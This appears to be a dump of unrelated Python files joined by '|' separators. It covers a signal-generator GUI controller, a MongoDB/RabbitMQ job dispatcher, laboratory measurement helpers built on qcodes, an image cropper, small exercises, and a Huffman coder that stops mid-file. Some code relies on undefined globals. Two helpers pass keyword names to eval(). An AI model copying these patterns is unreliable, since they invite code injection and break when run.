from SignalGenerationPackage.Sinus.SinusTimeFromCallBackOperator import SinusTimeFromCallBackOperator
from SignalGenerationPackage.Sinus.SinusTimeToCallBackOperator import SinusTimeToCallBackOperator
from SignalGenerationPackage.Sinus.SinusPointsNumberCallBackOperator import SinusPointsNumberCallBackOperator
from SignalGenerationPackage.Sinus.SinusPhaseCallBackOperator import SinusPhaseCallBackOperator
from SignalGenerationPackage.Sinus.SinusOmegaCallBackOperator import SinusOmegaCallBackOperator
from SignalGenerationPackage.Sinus.SinusMainWindow import SinusMainWindow
from CallBackOperators.ForwardSendingOperator import ForwardSendingOperator
from SignalGenerationPackage.Sinus.SinusUIParameters import SinusUIParameters
from SignalGenerationPackage.Sinus.AutoFillCallBackOperator import AutoFillCallBackOperator
from SignalGenerationPackage.Sinus.RequestFrequencyCallBackOperator import RequestFrequencyCallBackOperator
class SinusSignalController(SignalController):
    """Concrete SignalController wiring the sinus-signal model, observer,
    window, sliders and callback operators together.

    All init_* hooks are called by the SignalController base class; their
    relative order is defined there (not visible in this file).
    """
    def __init__(self):
        super().__init__()

    # overridden
    def init_model(self):
        self.model = SinusSignal()

    # overridden
    def init_observer(self):
        self.observer = SinusObserver(self.model, self.main_window.plot)

    # overridden
    def init_main_window(self):
        self.main_window = SinusMainWindow()

    # overridden
    def init_callback_operators(self):
        # One operator per editable sinus parameter, plus frequency requests
        # and slider auto-fill.  NOTE(review): AutoFillCallBackOperator reads
        # self.slider_constants / self.param_names / self.sliders — confirm
        # the base class initializes those before this hook runs.
        self.callback_operators = \
            [
                SinusAmplitudeCallBackOperator(self.model),
                SinusTimeFromCallBackOperator(self.model),
                SinusTimeToCallBackOperator(self.model),
                SinusPointsNumberCallBackOperator(self.model),
                SinusPhaseCallBackOperator(self.model),
                SinusOmegaCallBackOperator(self.model),
                RequestFrequencyCallBackOperator(self.model),
                AutoFillCallBackOperator(self.slider_constants, self.param_names, self.sliders, model=None),
            ]

    # overridden
    def init_plot_widget(self):
        self.plot_widget = self.main_window.user_interface.frame

    # overridden
    def append_sending_operator(self):
        self.callback_operators.append(ForwardSendingOperator(self.main_window, self.plot_widget, DebugMode=True))

    # overridden
    def init_param_names(self):
        # Order must match init_slider_constants and init_sliders below.
        self.param_names = [
            "Phase", "Omega", "Points Number", "Time From", "Time To", "Amplitude", "Request Frequency"
        ]

    # overridden
    def init_slider_constants(self):
        # Scale factors converting slider positions to parameter values;
        # positionally aligned with param_names.
        self.slider_constants = [
            SinusUIParameters.PhaseCalcConstant,
            SinusUIParameters.OmegaCalcConstant,
            SinusUIParameters.PointsNumberCalcConstant,
            SinusUIParameters.TimeFromCalcConstant,
            SinusUIParameters.TimeToCalcConstant,
            SinusUIParameters.AmplitudeCalcConstant,
            SinusUIParameters.RequestFreqCalcConstant
        ]

    def init_sliders(self):
        # Qt slider widgets, positionally aligned with param_names.
        ui = self.main_window.user_interface
        self.sliders = [
            ui.horizontalSliderPhase,
            ui.horizontalSliderOmega,
            ui.horizontalSliderPointsNumber,
            ui.horizontalSliderTimeFrom,
            ui.horizontalSliderTimeTo,
            ui.horizontalSliderAmplitude,
            ui.horizontalSliderRequestFrequency
        ]
import datetime
import pika
from pymongo import MongoClient
from bson import json_util
import json
__author__ = 'sam'
class PersistenceManager(object):
    """MongoDB-backed store of storage records, with RabbitMQ dispatch."""
    # Staleness window: storages not updated in this many minutes are due.
    minutes = 15

    def __init__(self,mongodb_host='localhost', mongodb_port=27017, mongodb_name='foreman'):
        self.client = MongoClient(mongodb_host, mongodb_port)
        self.db = self.client[mongodb_name]

    def find_storage_to_update(self):
        """Return a cursor over storages last updated before the window."""
        d = datetime.datetime.now() - datetime.timedelta(minutes=self.minutes)
        return self.db['storages'].find({"last-updated": {"$lt": d}})

    def dispatch_harverster(self,storage_data):
        """Publish one storage record to its provider's RabbitMQ queue."""
        connection = pika.BlockingConnection(pika.ConnectionParameters(
            host='localhost'))  #TODO
        channel = connection.channel()
        # Declare is idempotent; ensures the provider queue exists.
        channel.queue_declare(queue=storage_data['provider'])
        channel.basic_publish(exchange='',
                              routing_key=storage_data['provider'],
                              # json_util handles BSON types (ObjectId, dates).
                              body=json.dumps(storage_data, default=json_util.default))
        connection.close()
        self._log_event('foreman', 'dispatch harvester', storage_data)

    def _log_event(self, actor, event_name, data):
        """Append a timestamped audit record to the events_log collection."""
        event_document = {}
        event_document['timestamp'] = datetime.datetime.now()
        event_document['actor'] = actor
        event_document['event_name'] = event_name
        event_document['data'] = data
        # NOTE(review): Collection.insert() is removed in modern pymongo
        # (use insert_one) — confirm the pinned driver version supports it.
        self.db['events_log'].insert(event_document)
def main():
    # One foreman pass: log start, queue a harvester for every stale
    # storage record, log termination.
    persistence = PersistenceManager()
    persistence._log_event('foreman', 'started', {})
    storages = persistence.find_storage_to_update()
    # NOTE(review): cursor.count() is deprecated/removed in modern pymongo;
    # confirm the installed driver version still provides it.
    persistence._log_event('foreman', 'storage check', {'number_of_storage':storages.count()})
    for storage in storages:
        persistence.dispatch_harverster(storage)
    persistence._log_event('foreman', 'terminated', {})
if __name__ == '__main__':
    main()
|
import tests.helper as test_helper
# Make the code under test importable before the imports below run.
test_helper.amend_path(__file__)
import unittest
import git
class TestGit(unittest.TestCase):
    # Python 2 test module (uses the `print args` statement).
    def test_config(self):
        """git.config() should parse `git config --list` output into a dict."""
        import util
        _old_run = util.run
        # Stub util.run: the config listing gets canned output, everything
        # else falls through to the real runner.
        def mock_run(*args):
            print args
            if args == ('git', 'config', '--list'):
                return _old_run('echo', 'user.name=foo\nuser.email=foo@example.com')
            else:
                return _old_run(*args)
        util.run = mock_run
        config = git.config()
        self.assertEqual(config.get('user.name'), 'foo')
        self.assertEqual(config.get('user.email'), 'foo@example.com')
        # Restore the real runner so later tests are unaffected.
        util.run = _old_run
|
def numeroDigitos(numero):
    """Return the number of decimal digits of a non-negative integer."""
    if (numero < 10):
        return 1
    # BUG FIX: use integer division so the recursion stays exact for
    # arbitrarily large ints (the original's float division `numero/10`
    # loses precision past 2**53).  Also removed an unreachable trailing
    # `return 1` after the if/else.
    return 1 + numeroDigitos(numero // 10)
def invertir(numero):
    """Return `numero` with its decimal digits reversed (e.g. 432 -> 234)."""
    if (numero < 10):
        return numero
    # BUG FIX: `numero // 10` instead of the original int(numero/10) —
    # float division silently corrupts integers beyond 2**53.
    return (10**(numeroDigitos(numero)-1))*(numero%10) + invertir(numero // 10)
def palindromo(numero):
    """Recursively report whether `numero` reads the same in both directions.

    Returns the string "Palindromo" or "No palindromo".
    """
    # Base case: zero or one digit is trivially a palindrome.
    if(numeroDigitos(numero) <= 1):
        return "Palindromo"
    # First digit (last digit of the reversal) vs last digit.
    if(numero%10 == invertir(numero)%10):
        # Strip the leading digit, then the trailing /10 drops the last one.
        # NOTE(review): that /10 is float division, so the recursion proceeds
        # on floats and relies on float arithmetic staying exact — verify
        # behavior for inputs with many digits.
        return palindromo(int(numero - ((10**(numeroDigitos(numero)-1))*(numero/(10**(numeroDigitos(numero)-1)))))/10)
    else:
        return "No palindromo"
# Expected output: Palindromo, No palindromo, Palindromo.
print ( palindromo(43234) )
print ( palindromo(143234) )
print ( palindromo(1432341) )
|
from serversocket import ServerSocket
class TCPServer:
    """Thin facade over ServerSocket exposing its bound address and run loop."""

    def __init__(self, read_callback, maximum_connections=5, receive_bytes=2048):
        self.server_socket = ServerSocket(read_callback, maximum_connections, receive_bytes)
        # Mirror the underlying socket's bound address for convenient access.
        self.ip = self.server_socket.ip
        self.port = self.server_socket.port

    def run(self):
        """Delegate to the wrapped socket's accept/dispatch loop."""
        self.server_socket.run()
|
"""ImageCropper module; imported by ImageOperate aggregate class."""
from PIL import Image
import ImageColumnCropOperators
import statistics
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
pd.options.mode.chained_assignment = None
class ImageCropper(object):
    """
    Cropping function; removes black image borders and outputs cropped image without Moody's header.
    Attributes:
        final_rotate: Incoming straightened image object from the ImageRotater class.
        cropped_array: Cropped body portion of image as an array not including Moody's header.
        page_number_array: Cropped header portion of image as an array.
    """
    def __init__(self, rotated_image):
        self.final_rotate = rotated_image.final_rotate
        self.rotate_crop_data = self.rotate_crop()
        self.cropped_array = self.rotate_crop_data[0]
        self.page_number_array = self.rotate_crop_data[1]
        self.final_cropped_array = self.trim_sides()
    def rotate_crop(self):
        """Define crop points and perform cropping."""
        # crop_pts accumulates [top, bottom, left, right] over two passes.
        crop_pts = []
        # Convert rotated image to luminance array
        luminance_img = np.asarray((self.final_rotate).convert('L'))
        # Loop to identify crop points; examines image vertically, rotates 90°, repeats.
        for index in range(0, 2):
            # Rotate 90° for second treatment.
            if index == 1:
                luminance_img = np.rot90(luminance_img, k=3)
            # Take column average pixel density.
            # Normalized to [0, 1]: 1.0 = fully white row.
            axis_avgs = list((luminance_img.mean(axis=1)) / 255)
            # Convert array to pd DataFrame; take rolling mean of avgs (30px per iteration).
            axis_df = pd.DataFrame(axis_avgs, columns=['values'])
            rolling_mean = axis_df.rolling(30).mean()
            # Crop array to only show edges of image (300 pixels from left & right).
            split_val = 300
            split1 = rolling_mean.iloc[: split_val]
            split2 = rolling_mean.iloc[-(split_val) :]
            split_list = [split1, split2]
            # Take the median dimension value of range of values with 'whiteness' greater than .85.
            crop_pts_iteration = 0
            white_score = .85
            while crop_pts_iteration < 2:
                for split_range in split_list:
                    white_points = list(split_range.index[split_range['values'] > white_score])
                    if len(white_points) > 0:
                        # Few white rows: pick the extreme nearest the edge;
                        # many: pick the median of the white band.
                        if len(white_points) < 50:
                            if max(white_points) < (int(len(rolling_mean)) / 2):
                                white_range = int(min(white_points))
                            elif max(white_points) > (int(len(rolling_mean)) / 2):
                                white_range = int(max(white_points))
                        else:
                            white_range = int(statistics.median(white_points))
                        crop_pts.append(white_range)
                        crop_pts_iteration += 1
                        # Reset the relaxed thresholds for the next edge.
                        white_score = .85
                        split_val = 300
                        if crop_pts_iteration == 2:
                            break
                    else:
                        # No white rows found: widen the edge window on dark
                        # images, otherwise relax the whiteness threshold.
                        if split_range['values'].mean() < .5 and split_val < 600:
                            split_val += 100
                        else:
                            white_score -= .02
                        split1 = rolling_mean.iloc[: split_val]
                        split2 = rolling_mean.iloc[-(split_val) :]
                        split_list = [split1, split2]
                if crop_pts_iteration in [0, 2]:
                    break
                elif crop_pts_iteration == 1:
                    # Only the first edge matched: retry with splits swapped.
                    split_list = [split2, split1]
                    break
            # Rotate image back to upright; crop image on 'white_range' values.
            luminance_img = np.rot90(luminance_img, k=1)
        # NOTE(review): the hard-coded 1250px side insets look tuned to the
        # Moody's page layout — confirm before reusing on other scans.
        cropped_img = luminance_img[crop_pts[0] : crop_pts[1],
                                    crop_pts[2] + 1250 : crop_pts[3] -1250]
        cropped_df = pd.DataFrame(list((cropped_img.mean(axis=1)) / 255), columns=['values'])
        # Slice top 1000 pixels to identify page header.
        cut_value = 1000
        bar_value = .1
        header_crop = 0
        header_iteration = 0
        while header_crop == 0:
            header_slice = cropped_df[:cut_value]
            if len(list(header_slice.index[header_slice['values'] < bar_value])) > 0:
                # Darkest row in the top band marks the header rule line.
                header_crop = max(list(header_slice.index[header_slice['values'] < bar_value]))
                crop_pts[0] = crop_pts[0] + header_crop
                break
            else:
                # Relax the darkness threshold, give up after 5 tries.
                bar_value += .02
                header_iteration += 1
                if header_iteration > 5:
                    break
        # Look for eronious bottom-of-page elements to crop out as well.
        footer_crop = 0
        footer_iteration = 0
        while footer_crop == 0:
            footer_slice = cropped_df[-cut_value:]
            if len(list(footer_slice.index[footer_slice['values'] < bar_value])) > 0:
                footer_crop = min(list(footer_slice.index[footer_slice['values'] < bar_value]))
                crop_pts[1] = crop_pts[0] - header_crop + footer_crop
                break
            else:
                bar_value += .02
                footer_iteration += 1
                if footer_iteration > 5:
                    break
        # Crop final image to remove extra elements removed.
        cropped_array = luminance_img[crop_pts[0] : crop_pts[1],
                                      crop_pts[2] : crop_pts[3]]
        page_number_array = luminance_img[0 : crop_pts[0],
                                          crop_pts[2] : crop_pts[3]]
        # Return final cropped image and page number array for further processing.
        return (cropped_array, page_number_array)
    def trim_sides(self):
        """Trim residual dark bands from all four sides of cropped_array."""
        def build_array(array):
            """Return (rolling-mean column profile, per-half derivative tables)."""
            rolling_mean_vertical_array = ImageColumnCropOperators.convert_rolling_mean(array, 0, 10, 0)
            split_value = int(len(rolling_mean_vertical_array) / 2)
            vertical_array_split1 = rolling_mean_vertical_array.iloc[:split_value]
            vertical_array_split2 = rolling_mean_vertical_array.iloc[-split_value:]
            split_list = [vertical_array_split1, vertical_array_split2]
            iteration = 1
            array_var_list = []
            for array in split_list:
                # plt.plot(array)
                # plt.show()
                # Second half is reversed so both halves walk edge -> center.
                if iteration == 2:
                    array = array.iloc[::-1]
                # Discrete derivative of the brightness profile; binary flags
                # mark where brightness is falling (value decreasing).
                array_shift = pd.DataFrame(array['values'].shift(-1))
                array_shift.columns = ['values']
                array['values2'] = array_shift['values']
                array['distance'] = array['values2'] - array['values']
                array['distance_binary'] = [0 if value >= 0 else 1 for value in array['distance']]
                array_shift2 = pd.DataFrame(array['distance_binary'].shift(-1))
                array_shift2.columns = ['distance']
                array['distance_binary_shift'] = array_shift2['distance']
                array['index'] = array.index
                array = array[['index', 'distance', 'distance_binary', 'distance_binary_shift']]
                array['distance'].fillna(0, inplace=True)
                array['distance_binary'].fillna(0, inplace=True)
                array['distance_binary_shift'].fillna(0, inplace=True)
                array['distance_binary'] = array['distance_binary'].astype(int)
                array['distance_binary_shift'] = array['distance_binary_shift'].astype(int)
                array = array.values.tolist()
                array_var_list.append(array)
                iteration += 1
            return (rolling_mean_vertical_array, array_var_list)
        def descending_continuity(input_data, run_type):
            """Find the first sustained brightness drop from each edge;
            return the pair of crop indices (padded by 35px)."""
            rolling_mean_vertical_array = input_data[0]
            array_var_list = input_data[1]
            iteration = 1
            crop_points_inner = []
            for array in array_var_list:
                continuity = 0
                break_point = 0
                # Accumulate consecutive decreases; a cumulative drop past the
                # threshold (.025 first pass, .07 second) marks the edge.
                if run_type == 'original':
                    for i, distance_list in enumerate(array):
                        if distance_list[2] == 1 and distance_list[3] == 1:
                            continuity += -(distance_list[1])
                            if continuity >= .025:
                                break
                        else:
                            continuity = 0
                if run_type == 'second_pass':
                    for i, distance_list in enumerate(array):
                        if distance_list[2] == 1 and distance_list[3] == 1:
                            continuity += -(distance_list[1])
                            if continuity >= .07:
                                break
                        else:
                            continuity = 0
                # Pad the found edge by 35px, clamped to the array bounds.
                if iteration == 1:
                    if int(distance_list[0]) < 35:
                        crop_points_inner.append(0)
                    else:
                        crop_points_inner.append(int(distance_list[0]) - 35)
                elif iteration == 2:
                    if len(rolling_mean_vertical_array) - int(distance_list[0]) < 35:
                        crop_points_inner.append(len(rolling_mean_vertical_array))
                    else:
                        crop_points_inner.append(int(distance_list[0]) + 35)
                iteration += 1
            return crop_points_inner
        # First pass: edges from the vertical and (rotated) horizontal profiles.
        crop_points = []
        array_list = [self.cropped_array, np.rot90(self.cropped_array, k=1)]
        for array in array_list:
            array_data = build_array(array)
            array_crop_pts = descending_continuity(array_data, 'original')
            for point in array_crop_pts:
                crop_points.append(point)
        # NOTE(review): leftover debug output.
        print(crop_points)
        trimmed_image = self.cropped_array[crop_points[2] : crop_points[3], crop_points[0] : crop_points[1]]
        # Account for incomplete trimming on darker images.
        array_data = build_array(trimmed_image)
        array_crop_pts = descending_continuity(array_data, 'second_pass')
        if array_crop_pts[0] > 7:
            if array_crop_pts[0] > 100:
                array_crop_pts[0] = 100
            crop_points[0] = crop_points[0] + array_crop_pts[0]
        elif abs(array_crop_pts[1] - crop_points[1]) > 7 and abs(array_crop_pts[1] - crop_points[1]) < 100:
            difference = abs(array_crop_pts[1] - crop_points[1])
            if difference > 25:
                difference = 25
            crop_points[1] = crop_points[1] - difference
        # NOTE(review): leftover debug output.
        print(crop_points)
        trimmed_image_out = self.cropped_array[crop_points[2] : crop_points[3], crop_points[0] : crop_points[1]]
        return trimmed_image_out
|
# Name: Taidgh Murray
# Student ID: 15315901
# File: sentence.py
############################################################################
# Read a sentence, report its word count and average word length.
sen=input("Please type a sentence here: ")
words = sen.split()
amount = len(words)
print("There are", amount, "words in this sentence")
letters = len(sen.replace(" ", ""))
# Guard against an empty sentence (the original raised ZeroDivisionError).
avg = letters / amount if amount else 0
# Typo fix in user-facing text: "lenght" -> "length".
print("The average word length is", avg)
|
# Generated by Django 2.1.2 on 2019-07-28 16:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Must follow the previous career_test migration so the table exists.
    dependencies = [
        ('career_test', '0006_auto_20190729_0002'),
    ]
    # Re-declare mbtianwsertype.choice as a cascading foreign key to Choice.
    operations = [
        migrations.AlterField(
            model_name='mbtianwsertype',
            name='choice',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='career_test.Choice'),
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 16:56:45 2019
@author: measPC
"""
import numpy as np
import matplotlib.pyplot as plt
import time, datetime, math
import ctypes, os, csv, sys
from scipy.signal import savgol_filter
from IPython.display import clear_output
from progressbar import *
from tqdm import tqdm, tqdm_notebook
import qcodes as qc
from qcodes import Station
from qcodes.instrument.base import Instrument
from qcodes.dataset.experiment_container import (Experiment,
load_last_experiment,
new_experiment)
from qcodes.dataset.database import initialise_database
from qcodes.dataset.measurements import Measurement
from qcodes.dataset.plotting import plot_by_id, get_data_by_id
from qcodes.dataset.data_export import get_shaped_data_by_runid
def set_state ( **kwargs ):
    """
    Set values on instrument parameters looked up by name.

    args:
        **kwargs: dict of InstNicknames and values to be set

    NOTE(review): eval() resolves each keyword name against this module's
    globals — instruments must be defined at module level, and untrusted
    keyword names must never reach this function.
    """
    for var, val in kwargs.items():
        eval(var).set(val)
def vset_state ( **kwargs):
    """
    Verbose setting of values on instrument parameters looked up by name.

    args:
        **kwargs: dict of InstNicknames and values to be set

    NOTE(review): as in set_state, eval() resolves names against module
    globals — keep inputs trusted.
    """
    for var, val in kwargs.items():
        # BUG FIX: the original called `var.label` on the *string* name
        # (AttributeError) and referenced an undefined `device` (NameError);
        # resolve the parameter once and use it for set() and the message.
        device = eval(var)
        device.set(val)
        tqdm.write('{} is set to {}{}'.format(device.label, eng( val ), device.unit) )
# NOTE(review): the defaults `setup = setup, cleanup = cleanup` bind
# module-level callables at definition time; they must already be defined
# (elsewhere / in the driving notebook) when this module is executed.
def set_meas(dep, fast_indep, slow_indep = None, setup = setup, cleanup = cleanup):
    """
    Registration of the parameters and setting up before/after run procedure
    args:
        dep: InstParameter to be registered as dependent var
        fast_indep: InstParameter to be registered as fast independent var
        slow_indep: InstParameter to be registered as second independent var (if any)
        setup: Procedure to be done before run
        cleanup: Procedure to be done after run
    returns:
        meas: Measurement() object
    """
    meas = Measurement()
    meas.register_parameter( fast_indep )  # register the fast independent parameter
    if slow_indep is not None:
        meas.register_parameter( slow_indep )  # register the first independent parameter
        meas.register_parameter( dep , setpoints = ( slow_indep, fast_indep ) )
    else:
        meas.register_parameter( dep, setpoints = ( fast_indep , ))
    meas.add_before_run(setup, args=())
    meas.add_after_run(cleanup, args=())
    # Flush acquired data to the database every 2 seconds.
    meas.write_period = 2
    return meas
# NOTE(review): relies on module-level globals `iqmixer` and `var_list`
# defined elsewhere (instrument setup script / notebook).
def probe_scan( datasaver, probe_list, **kwargs):
    """
    DEPRECATE, use more general version S21_scan
    Do scan through probe_list and save result to the datasaver
    args:
        datasaver: Datasaver to save results of the measurement
        probe_list: Frequency list to scan through
        **kwargs: dict of the InstParameters and its values to add to datasaver (have to be defined in set_meas)
    """
    probe_min = np.min (probe_list)
    probe_max = np.max (probe_list)
    pbar = tqdm_notebook(probe_list, desc = '{} to {} GHz scan'.format( probe_min/1e9,probe_max/1e9 ),
                                                 leave = False)
    with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 4000):
        for f in pbar:
            iqmixer.frequency.set( f )
            pbar.set_description('{:1.4f}GHz'.format(f/1e9))
            # Arm the digitizer, then read the averaged S21 amplitude.
            iqmixer.ats.start_capturing()
            S21 = iqmixer.S21.get()
            if not kwargs:
                datasaver.add_result(( iqmixer.frequency, f),
                                     ( iqmixer.S21_ampl, S21.ampl))
            else:
                # Attach the extra registered parameters to every row.
                for var, val in kwargs.items():
                    device = var_list[var]
                    datasaver.add_result(( device, val),
                                         ( iqmixer.frequency, f),
                                         ( iqmixer.S21_ampl, S21.ampl))
# NOTE(review): relies on module-level globals `iqmixer`, `ats` and `eng`
# defined elsewhere (instrument setup script / notebook).
def S21_scan(datasaver, y_var, x_var, x_list, **kwargs):
    """
    Scan any InstrParameter (x_var) through x_list, measuring y_var at each
    point, and save every row to the datasaver.
    args:
        datasaver: Datasaver to save results of the measurement
        y_var: InstParameter to be measured (tested only on S21.ampl and S21.phase)
        x_var: InstParameter to be scanned (indep var)
        x_list: list of values to scan through
        **kwargs: dict of the InstParameters and its values to add to datasaver (have to be defined in set_meas)
    """
    ydevice = y_var
    xdevice = x_var
    xunit = xdevice.unit
    xlabel = xdevice.label
    x_min = np.min (x_list)
    x_max = np.max (x_list)
    tx_list = tqdm_notebook(x_list, desc = '{} to {} {} scan'.format( eng(x_min), eng(x_max ), xunit),
                                                 leave = False)
    # Configure digitizer triggering before arming the capture context.
    with ats.syncing():
        ats.external_trigger_range('ETR_1V')
        ats.aux_io_mode("AUX_IN_TRIGGER_ENABLE")
        ats.aux_io_mode("AUX_OUT_TRIGGER")
        #ats.aux_io_param("TRIG_SLOPE_NEGATIVE")
    with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 4000):
        for x in tx_list:
            xdevice.set( x )
            tx_list.set_description('{} @ {}{}'.format( xlabel, eng(x), xunit ))
            iqmixer.ats.start_capturing()
            S21 = ydevice.get()
            # Prepend any fixed-parameter columns, then store the row.
            res = [ ( xdevice, x), ( ydevice, S21 ) ]
            for var, val in kwargs.items():
                res = [( eval(var), val)] + res
            datasaver.add_result(*res)
# NOTE(review): relies on module-level globals `iqmixer`, `pump`, `eng`
# and `f_target` defined elsewhere (instrument setup script / notebook).
def pump_sweep(y_var,fpump_list, Nsw):
    """
    Do pump sweep with averaging and random delay
    args:
        y_var: InstParameter to be measured (tested only on S21.ampl and S21.phase)
        fpump_list: list of pump freq values to scan through
        Nsw: number of sweeps for avging
    result:
        array of squared deviations of the sweep-averaged y_var from its
        mean, one entry per frequency in fpump_list
    """
    rnd = np.random.random
    buf = np.zeros(len(fpump_list))
    ydevice = y_var
    with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 400):
        tNsw = tqdm_notebook(range(Nsw), desc = 'pump scan', leave = False)
        tNsw.set_description('pump scan @ {}GHz'.format( eng(f_target) ))
        for j in tNsw:
            # Random 100-600 ms pause between sweeps to decorrelate drift.
            time.sleep(rnd()*0.5 + .100)
            for i,fpump in enumerate(fpump_list):
                pump.frequency.set( fpump )
                #pump.frequency.get()
                time.sleep(0.003)
                iqmixer.ats.start_capturing()
                S21 = ydevice.get()
                buf[i] += S21
    # Average over sweeps, then return squared deviation from the mean.
    result = buf / Nsw
    result = (result - np.mean(result))**2
    return result
# NOTE(review): relies on module-level globals `iqmixer`, `pump`, `ats`,
# `eng` and `f_target` defined elsewhere (instrument setup / notebook).
def pump_autosweep(y_var,fpump_list, Nsw, dt ):
    """
    Do pump sweep using the generator's internal stepped list sweep
    (hardware-timed, dwell `dt` per point) with averaging and random delay.
    args:
        y_var: InstParameter to be measured (tested only on S21.ampl and S21.phase)
        fpump_list: list of pump freq values to scan through
        Nsw: number of sweeps for avging
        dt: dwell time per sweep point, seconds
    result:
        array of squared deviations of the sweep-averaged y_var from its
        mean, one entry per frequency in fpump_list
    """
    rnd = np.random.random
    buf = np.zeros(len(fpump_list))
    ydevice = y_var
    pump_min = np.min(fpump_list)
    pump_max = np.max(fpump_list)
    Npump = len(fpump_list)
    # SCPI program for the pump generator: stepped frequency sweep covering
    # fpump_list end-to-end with Npump points.
    # NOTE(review): assumes fpump_list is uniformly spaced — the generator's
    # STEP sweep is linear; confirm callers never pass non-uniform lists.
    command_list=[  "*RST\n",
                    "*CLS\n",
                    "FREQ:MODE LIST\n",
                    "LIST:TYPE STEP\n",
                    "FREQ:STAR {} GHz\n".format((pump_min)/1e9),
                    "FREQ:STOP {} GHz\n".format((pump_max)/1e9),
                    "SWE:POIN {}\n".format(Npump),
                    #"SWE:POIN 11\n",
                    "SWE:DWEL {} S\n".format(dt),
                    "POW:AMPL 5 dBm\n",
                    "OUTP:STAT ON\n"]#, #Turn source RF state on
    with ats.syncing():
        ats.external_trigger_range('ETR_1V')
        ats.aux_io_mode("AUX_IN_TRIGGER_ENABLE")
        #ats.aux_io_mode("AUX_OUT_TRIGGER")
        ats.aux_io_param("TRIG_SLOPE_POSITIVE")
    with iqmixer.ats.get_prepared(N_pts = 8192, N_avg = 400):
        tNsw = tqdm_notebook(range(Nsw), desc = 'pump scan', leave = False)
        tNsw.set_description('pump scan @ {}GHz'.format( eng(f_target) ))
        #iqmixer.ats.start_capturing()
        for j in tNsw:
            # Random 100-600 ms pause between sweeps to decorrelate drift.
            time.sleep(rnd()*0.5 + .100)
            for command in command_list:
                pump.write(command)
            elapsed = np.zeros(Npump)
            for i,fpump in enumerate(fpump_list):
                #pump.frequency.set( fpump )
                #pump.frequency.get()
                #time.sleep(0.003)
                iqmixer.ats.start_capturing()
                # Kick off the generator's sweep on the first point only;
                # subsequent points are advanced by the generator itself.
                if i == 0:
                    pump.write("TRIG:SOUR IMM")
                    pump.write("INIT")
                    #pump.write("INIT:CONT ON\n")
                start = time.time()
                S21 = ydevice.get()
                elapsed[i] = time.time() - start
                buf[i] += S21
            # Debug: report the mean acquisition time per point this sweep.
            tqdm.write('{}- {}'.format(j, np.mean(elapsed[1:]) ) )
    # Average over sweeps, then return squared deviation from the mean.
    result = buf / Nsw
    result = (result - np.mean(result))**2
    return result
def scan_find_steep(datasaver_probe, offset, probe_list, **kwargs):
    """
    Run a probe-frequency scan and locate a point on the resonance slope.

    args:
        datasaver_probe: Datasaver used to record the probe scan
        offset: fractional position on the slope, 0 for the S21 minimum,
                1 for the S21 maximum
        probe_list: probe frequencies to sweep through
        **kwargs: extra InstParameter values forwarded to the datasaver
                  (have to be defined in set_meas)
    returns:
        (f_target, S21_target): frequency and S21 level of the chosen point
    """
    n_points = len(probe_list)
    # Acquire the scan; the datasaver records it under a fresh run id.
    S21_scan(datasaver_probe, S21_ampl, fprobe, probe_list, **kwargs)
    run_id = datasaver_probe.run_id
    # Keep only the tail belonging to this scan.
    trace = get_data_by_id(run_id)[0][1]['data'][-n_points:]
    freqs = probe_list
    # Smooth the raw trace; savgol_filter requires an odd window length,
    # so retry with window+1 when the first attempt is rejected.
    window = int(n_points / 10)
    try:
        smoothed = savgol_filter(trace, window, 2)
    except ValueError:
        smoothed = savgol_filter(trace, window + 1, 2)
    idx_min, idx_max, _, _, s21_min, s21_max = xy_maxmin(freqs, smoothed)
    S21_target = s21_min + (s21_max - s21_min) * offset
    # Restrict the search to the slope between the two extrema.
    lo, hi = (idx_min, idx_max) if idx_min < idx_max else (idx_max, idx_min)
    f_target = xy_maxmin(freqs[lo:hi], np.abs(smoothed[lo:hi] - S21_target))[2]
    return f_target, S21_target
|
"""
Huffman Coding
By: Gunvir Ranu
This is a simple implementation of Huffman Coding.
It's kinda efficient for Python, but is still slow.
Can compress a 5 MB file in about 3 seconds.
Decompression takes much longer, about 9 seconds for the same file.
It reads text from a text file called `text.txt`.
Then calls various functions to generate the compressed text.
Can then use the compressed text and generated binary tree to decompress the data
The only function calls needed from main are `huffman_compress` and `huffman_decompress`.
Will document or explain code if wanted.
"""
import heapq
import itertools

from collections import Counter
CHAR_LEN = 7
def get_freqs(text):
    """Count how many times each character occurs in *text*."""
    counts = Counter()
    counts.update(text)
    return counts
def sort_freqs(freqs):
    """Turn a {char: count} mapping into (count, char) pairs, ascending."""
    return sorted((count, char) for char, count in freqs.items())
def get_tree(nodes):
    """Merge weighted leaf nodes into a single Huffman tree.

    Repeatedly combines the two lightest nodes into a parent
    ``(w1 + w2, (lighter, heavier))`` until one root remains.

    Uses a heap (O(n log n)) instead of re-sorting the whole node
    list after every merge (O(n^2 log n)), which dominated tree
    construction for large alphabets.  A monotonically increasing
    sequence number breaks weight ties, so the heap never compares
    the payloads (str vs tuple payloads are not mutually orderable)
    and ties resolve in the same order as the original stable sort.

    args:
        nodes: list of (weight, letter) leaf tuples (as from sort_freqs)
    returns:
        the root node (weight, subtree); a single input node is
        returned unchanged
    """
    tiebreak = itertools.count()
    heap = [(node[0], next(tiebreak), node) for node in nodes]
    heapq.heapify(heap)
    while len(heap) > 1:
        w1, _, left = heapq.heappop(heap)
        w2, _, right = heapq.heappop(heap)
        merged = (w1 + w2, (left, right))
        heapq.heappush(heap, (merged[0], next(tiebreak), merged))
    return heap[0][2]
def cut_tree(tree):
    """Strip the weights from a Huffman tree, keeping only its shape.

    Leaves become bare characters; internal nodes become 2-tuples of
    their trimmed children.
    """
    payload = tree[1]
    if not isinstance(payload, str):
        return (cut_tree(payload[0]), cut_tree(payload[1]))
    return payload
def get_codes(tree, upper_code=""):
    """Map each leaf character to its bit-string code.

    '0' marks a step into the left subtree, '1' a step into the right.
    """
    if isinstance(tree, str):
        return {tree: upper_code}
    left, right = tree
    codes = get_codes(left, upper_code + '0')
    codes.update(get_codes(right, upper_code + '1'))
    return codes
def encode_bits(text, codes):
    """Translate *text* into a flat list of '0'/'1' characters via *codes*."""
    return [bit for letter in text for bit in codes[letter]]
def bits_to_text(bits):
    """Pack a list of '0'/'1' characters into CHAR_LEN-bit characters.

    The final chunk may hold fewer than CHAR_LEN bits, so its true
